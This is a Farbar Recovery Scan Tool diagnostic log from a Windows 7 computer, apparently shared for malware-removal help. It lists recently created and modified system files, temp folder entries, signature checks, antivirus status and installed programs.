2014-10-14 15:20 - 2014-07-06 21:06 - 00284672 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00206848 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00188416 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00082432 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00058880 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00055808 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2014-10-14 15:20 - 2014-07-06 21:06 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2014-10-14 15:20 - 2014-07-06 21:06 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2014-10-14 15:20 - 2014-07-06 21:06 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
2014-10-14 15:20 - 2014-07-06 21:05 - 12625920 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2014-10-14 15:20 - 2014-07-06 21:05 - 00126464 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2014-10-14 15:20 - 2014-07-06 21:02 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2014-10-14 15:20 - 2014-07-06 20:52 - 00663552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys
2014-10-14 15:20 - 2014-07-06 20:40 - 11411456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 03208704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 01329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 01174528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 01005056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptui.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00504320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msscp.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00489984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00442880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AUDIOKSE.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00406016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmmgrtn.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00374784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioEng.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00354816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00265216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msnetobj.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00195584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioSes.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00143872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00103424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00081408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsp.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00008192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\spwmp.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdxm.ocx
2014-10-14 15:20 - 2014-07-06 20:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxmasf.dll
2014-10-14 15:20 - 2014-07-06 20:39 - 12625408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmploc.DLL
2014-10-14 15:20 - 2014-07-06 20:39 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rrinstaller.exe
2014-10-14 15:20 - 2014-07-06 20:39 - 00023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfpmp.exe
2014-10-14 15:20 - 2014-07-06 20:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mferror.dll
2014-10-14 15:20 - 2014-07-06 20:04 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2014-10-14 15:20 - 2014-06-27 19:21 - 00619056 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2014-10-14 15:20 - 2014-06-27 19:21 - 00533200 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2014-10-14 15:20 - 2014-06-27 19:21 - 00457400 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll
2014-10-14 15:19 - 2014-09-25 17:50 - 13619200 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-14 15:19 - 2014-09-18 21:25 - 23631360 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-14 15:19 - 2014-09-18 20:40 - 00547328 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-14 15:19 - 2014-09-18 20:38 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-10-14 15:19 - 2014-09-18 20:36 - 05829632 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-14 15:19 - 2014-09-18 20:31 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-14 15:19 - 2014-09-18 20:27 - 00595968 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-14 15:19 - 2014-09-18 20:26 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-14 15:19 - 2014-09-18 20:25 - 04201472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-10-14 15:19 - 2014-09-18 20:25 - 00758272 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-10-14 15:19 - 2014-09-18 20:18 - 00940032 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-10-14 15:19 - 2014-09-18 20:02 - 00454656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-10-14 15:19 - 2014-09-18 20:01 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-14 15:19 - 2014-09-18 20:00 - 00085504 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-14 15:19 - 2014-09-18 19:59 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2014-10-14 15:19 - 2014-09-18 19:58 - 00289280 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-14 15:19 - 2014-09-18 19:50 - 00112128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-10-14 15:19 - 2014-09-18 19:40 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-10-14 15:19 - 2014-09-18 19:33 - 02309632 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-14 15:19 - 2014-09-18 19:32 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-10-14 15:19 - 2014-09-18 18:59 - 01810944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-10-14 15:19 - 2014-09-18 18:59 - 00775168 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-14 15:19 - 2014-09-18 18:52 - 00678400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2014-10-14 15:18 - 2014-09-17 21:00 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-10-14 15:18 - 2014-09-17 20:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2014-10-14 15:17 - 2014-09-12 20:58 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-14 15:17 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll
2014-10-14 15:17 - 2014-09-04 00:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2014-10-14 15:17 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll
2014-10-14 15:17 - 2014-07-16 21:07 - 03722240 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-10-14 15:17 - 2014-07-16 21:07 - 01118720 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2014-10-14 15:17 - 2014-07-16 21:07 - 00681984 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-10-14 15:17 - 2014-07-16 21:07 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-10-14 15:17 - 2014-07-16 21:07 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2014-10-14 15:17 - 2014-07-16 21:07 - 00150528 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2014-10-14 15:17 - 2014-07-16 21:07 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-10-14 15:17 - 2014-07-16 21:07 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-10-14 15:17 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll
2014-10-14 15:17 - 2014-07-16 20:39 - 03221504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2014-10-14 15:17 - 2014-07-16 20:39 - 01051136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe
2014-10-14 15:17 - 2014-07-16 20:39 - 00131584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aaclient.dll
2014-10-14 15:17 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2014-10-14 15:17 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2014-10-14 15:17 - 2014-07-16 20:21 - 00212480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2014-10-14 15:17 - 2014-07-16 20:21 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
==================== One Month Modified Files and Folders =======
(If an entry is included in the fixlist, the file\folder will be moved.)
2014-11-07 17:43 - 2012-06-09 02:40 - 01546012 _____ () C:\Windows\WindowsUpdate.log
2014-11-07 17:39 - 2012-01-02 04:18 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-11-07 17:36 - 2013-10-27 14:17 - 00000904 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001UA.job
2014-11-07 17:36 - 2013-10-27 14:17 - 00000852 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001Core.job
2014-11-07 15:53 - 2012-08-05 23:52 - 00000000 ____D () C:\Users\Ryan\Documents\Bluetooth Folder
2014-11-06 16:18 - 2009-07-13 23:45 - 00027744 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-11-06 16:18 - 2009-07-13 23:45 - 00027744 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-11-06 16:11 - 2012-05-04 13:49 - 00073946 _____ () C:\Windows\setupact.log
2014-11-06 16:11 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-11-05 17:45 - 2009-07-14 00:13 - 00006214 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-11-04 15:31 - 2012-08-10 11:38 - 00000000 ____D () C:\Users\Ryan\AppData\Local\CrashDumps
2014-11-03 21:28 - 2012-11-08 14:14 - 00000000 ____D () C:\Users\Ryan\.gimp-2.8
2014-11-03 18:23 - 2012-05-18 18:17 - 00264590 _____ () C:\Windows\PFRO.log
2014-11-03 15:18 - 2012-08-05 23:51 - 00000000 ____D () C:\Users\Ryan
2014-11-03 15:18 - 2009-07-13 21:34 - 00000215 _____ () C:\Windows\system.ini
2014-11-01 17:00 - 2013-10-16 05:44 - 00000000 ____D () C:\Users\Ryan\Documents\Postcolonial Medicine
2014-10-31 14:58 - 2014-04-12 01:42 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-30 20:43 - 2013-01-18 22:39 - 00708608 ___SH () C:\Users\Ryan\Desktop\Thumbs.db
2014-10-30 06:25 - 2010-11-20 22:27 - 00275080 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-10-29 15:49 - 2014-04-12 01:42 - 00001113 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-29 15:49 - 2014-04-12 01:42 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-29 15:49 - 2014-04-12 01:42 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-22 16:31 - 2013-10-27 14:17 - 00003872 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001UA
2014-10-22 16:31 - 2013-10-27 14:17 - 00003476 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001Core
2014-10-21 10:22 - 2012-08-28 22:49 - 00000000 ____D () C:\Users\Ryan\AppData\Local\Microsoft Help
2014-10-15 18:46 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\rescache
2014-10-15 15:38 - 2013-10-25 17:22 - 00000000 ____D () C:\ProgramData\Oracle
2014-10-15 15:29 - 2009-07-14 00:09 - 00000000 ____D () C:\Windows\System32\Tasks\WPD
2014-10-15 15:27 - 2009-07-13 23:45 - 00342240 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-15 15:25 - 2014-05-06 23:19 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-10-15 15:25 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\SysWOW64\Dism
2014-10-15 15:25 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\Dism
2014-10-15 02:01 - 2012-08-28 22:49 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-10-15 01:57 - 2014-05-09 16:11 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-15 01:54 - 2014-05-09 16:11 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-10-13 16:36 - 2012-09-17 11:31 - 00000000 ____D () C:\Users\Ryan\Documents\Personal Statement Docs
2014-10-13 15:01 - 2013-02-09 15:54 - 00000000 ____D () C:\Users\Ryan\Documents\Poems
2014-10-12 22:37 - 2012-08-05 23:51 - 00000000 ____D () C:\Users\Ryan\AppData\Roaming\Skype
Some content of TEMP:
====================
C:\Users\Ryan\AppData\Local\Temp\dllnt_dump.dll
C:\Users\Ryan\AppData\Local\Temp\Quarantine.exe
==================== Bamital & volsnap Check =================
(There is no automatic fix for files that do not pass verification.)
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
LastRegBack: 2014-11-05 19:02
==================== End Of Log ============================
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 02-11-2014
Ran by Ryan at 2014-11-07 17:46:56
Running from C:\Users\Ryan\Desktop
Boot Mode: Normal
==========================================================
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Microsoft Security Essentials (Enabled - Up to date) {4F35CFC4-45A3-FC37-EF17-759A02E39AB1}
AS: Microsoft Security Essentials (Enabled - Up to date) {F4542E20-6399-F3B9-D5A7-4EE87964D00C}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Reader X (10.1.12) MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}) (Version: 10.1.12 - Adobe Systems Incorporated)
Apple Application Support (HKLM-x32\...\{AAC5D43E-816D-4C2D-8E51-55FFF35BE301}) (Version: 3.0.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{787136D2-F0F8-4625-AA3F-72D7795AC842}) (Version: 7.1.1.3 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Atheros Bluetooth Suite (64) (HKLM\...\{230D1595-57DA-4933-8C4E-375797EBB7E1}) (Version: 7.4.0.122 - Atheros)
Atheros WLAN Client Installation Program (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 7.0 - Atheros)
Audacity 2.0.5 (HKLM-x32\...\Audacity_is1) (Version: 2.0.5 - Audacity Team)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Cirrus Logic Audio (HKLM-x32\...\{3A69FD31-5EE7-42C9-918B-81C07AA21043}) (Version: 10.14.0.0 - Cirrus Logic)
Cirrus Logic Audio x64 (Version: 7.25.38.0 - Cirrus Logic) Hidden
Common Desktop Agent (Version: 1.62.0 - OEM) Hidden
Control ActiveX de Windows Live Mesh para conexiones remotas (HKLM-x32\...\{04668DF2-D32F-4555-9C7E-35523DCD6544}) (Version: 15.4.5722.2 - Microsoft Corporation)
Contrôle ActiveX Windows Live Mesh pour connexions à distance (HKLM-x32\...\{55D003F4-9599-44BF-BA9E-95D060730DD3}) (Version: 15.4.5722.2 - Microsoft Corporation)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Galería fotográfica de Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Galerie de photos Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Garmin ANT Agent (HKLM\...\{20B0E07B-12EA-4BAB-A3B1-E17D7568EB6F}) (Version: 2.3.4 - Garmin Ltd or its subsidiaries)
Garmin USB Drivers (HKLM-x32\...\{3D5D6CFC-3097-425A-8D8F-7EAF5D57641D}) (Version: 2.3.1.0 - Garmin Ltd or its subsidiaries)
GIMP 2.8.2 (HKLM\...\GIMP-2_is1) (Version: 2.8.2 - The GIMP Team)
Google Talk Plugin (HKLM-x32\...\{95763F66-297E-30CE-9728-6D0F20BF97F5}) (Version: 5.38.5.0 - Google)
GoToMeeting 5.3.0.1009 (HKCU\...\GoToMeeting) (Version: 5.3.0.1009 - CitrixOnline)
Intel(R) Manageability Engine Firmware Recovery Agent (HKLM-x32\...\{A6C48A9F-694A-4234-B3AA-62590B668927}) (Version: 1.0.0.36279 - Intel Corporation)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.0.10.1464 - Intel Corporation)
Intel(R) OpenCL CPU Runtime (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2752 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.1.0.1006 - Intel Corporation)
Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 1.0.4.220 - Intel Corporation)
iTunes (HKLM\...\{B8BA155B-1E75-405F-9CB4-8A99615D09DC}) (Version: 11.1.5.5 - Apple Inc.)
Java 7 Update 71 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F03217071FF}) (Version: 7.0.710 - Oracle)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
LAME v3.99.3 (for Windows) (HKLM-x32\...\LAME_is1) (Version: - )
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4.5.1 (español) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 3082) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (Français) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1036) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office Home and Student 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.6.305.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
NVIDIA Graphics Driver 296.28 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 296.28 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.12.0213 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.12.0213 - NVIDIA Corporation)
Perfect Photo Suite 7.0.1 (HKLM-x32\...\{6727F16E-6BF0-4E73-AC73-958A382AA09E}) (Version: 7.0.1 - onOne Software)
Premium Sound HD (HKLM\...\{3007FF9F-5B2C-41FF-8BFC-08BF25DB2681}) (Version: 1.12.3000 - SRS Labs, Inc.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.52.203.2012 - Realtek)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7601.30130 - Realtek Semiconductor Corp.)
Samsung Easy Printer Manager (HKLM-x32\...\Samsung Easy Printer Manager) (Version: 1.05.21.00(2/3/2014) - Samsung Electronics Co., Ltd.)
Samsung Easy Wireless Setup (HKLM-x32\...\Easy Wireless Setup) (Version: 3.60.40.03 - Samsung Electronics Co., Ltd.)
Samsung Printer Live Update (HKLM-x32\...\Samsung Printer Live Update) (Version: 1.01.00:04(2013-04-22) - Samsung Electronics Co., Ltd.)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version: - Microsoft)
SES Driver (HKLM\...\{D8CC254C-C671-4664-9A38-FA368D1E2C97}) (Version: 1.0.0 - Western Digital)
Skype™ 6.20 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 6.20.104 - Skype Technologies S.A.)
Tweaking.com - Registry Backup (HKLM-x32\...\Tweaking.com - Registry Backup) (Version: 1.10.1 - Tweaking.com)
USB3Setup (HKLM-x32\...\{4814105D-5756-4CD7-9430-ADA474A3E192}) (Version: 1.0.4.220 - VIZIO)
VIZIO Wireless Driver (HKLM-x32\...\{3A9C1D7A-A227-442F-B296-14AEBC4E85C1}) (Version: 1.00.0001 - VIZIO)
VIZIO Wireless Touchpad (HKLM-x32\...\{3F0E78CA-735E-446D-8E60-69C6CA27EC95}) (Version: 1.00.0001 - VIZIO)
VIZIO_FN_Key_Utility (HKLM-x32\...\{106AEB0E-1FF7-44BD-B510-6CF9A3934FAC}) (Version: 1.3.15 - VIZIO)
VIZIOUtility version 1.0 (HKLM-x32\...\{4F949BD9-1E99-40C7-9102-C67E2D384995}_is1) (Version: 1.0 - VIZIO)
VLC media player 2.1.3 (HKLM-x32\...\VLC media player) (Version: 2.1.3 - VideoLAN)
Windows Driver Package - Dynastream Innovations (libusb0) LibUsbDevices (07/07/2009 1.12.2) (HKLM\...\24DA573F901348FFDFF7717497830D45BE0C362E) (Version: 07/07/2009 1.12.2 - Dynastream Innovations)
Windows Driver Package - Garmin (grmnusb) GARMIN Devices (04/19/2012 2.3.1.0) (HKLM\...\98157A226B40B173301B0F53C8E98C47805D5152) (Version: 04/19/2012 2.3.1.0 - Garmin)
Windows Driver Package - Silicon Labs Software (DSI_SiUSBXp_3_1) USB (02/06/2007 3.1) (HKLM\...\D1506E0025B5A3F9EB8270FE81C1EEDD9388B8A2) (Version: 02/06/2007 3.1 - Silicon Labs Software)
Windows Driver Package - Western Digital Technologies (WDC_SAM) WDC_SAM (01/19/2011 1.0.0009.0) (HKLM\...\4CA7CFBB29889F25ACB3DF6E3A42BAE29EB43B20) (Version: 01/19/2011 1.0.0009.0 - Western Digital Technologies)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
Zune (HKLM\...\Zune) (Version: 04.07.1404.01 - Microsoft Corporation)
==================== Custom CLSID (selected items): ==========================
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll (Google Inc.)
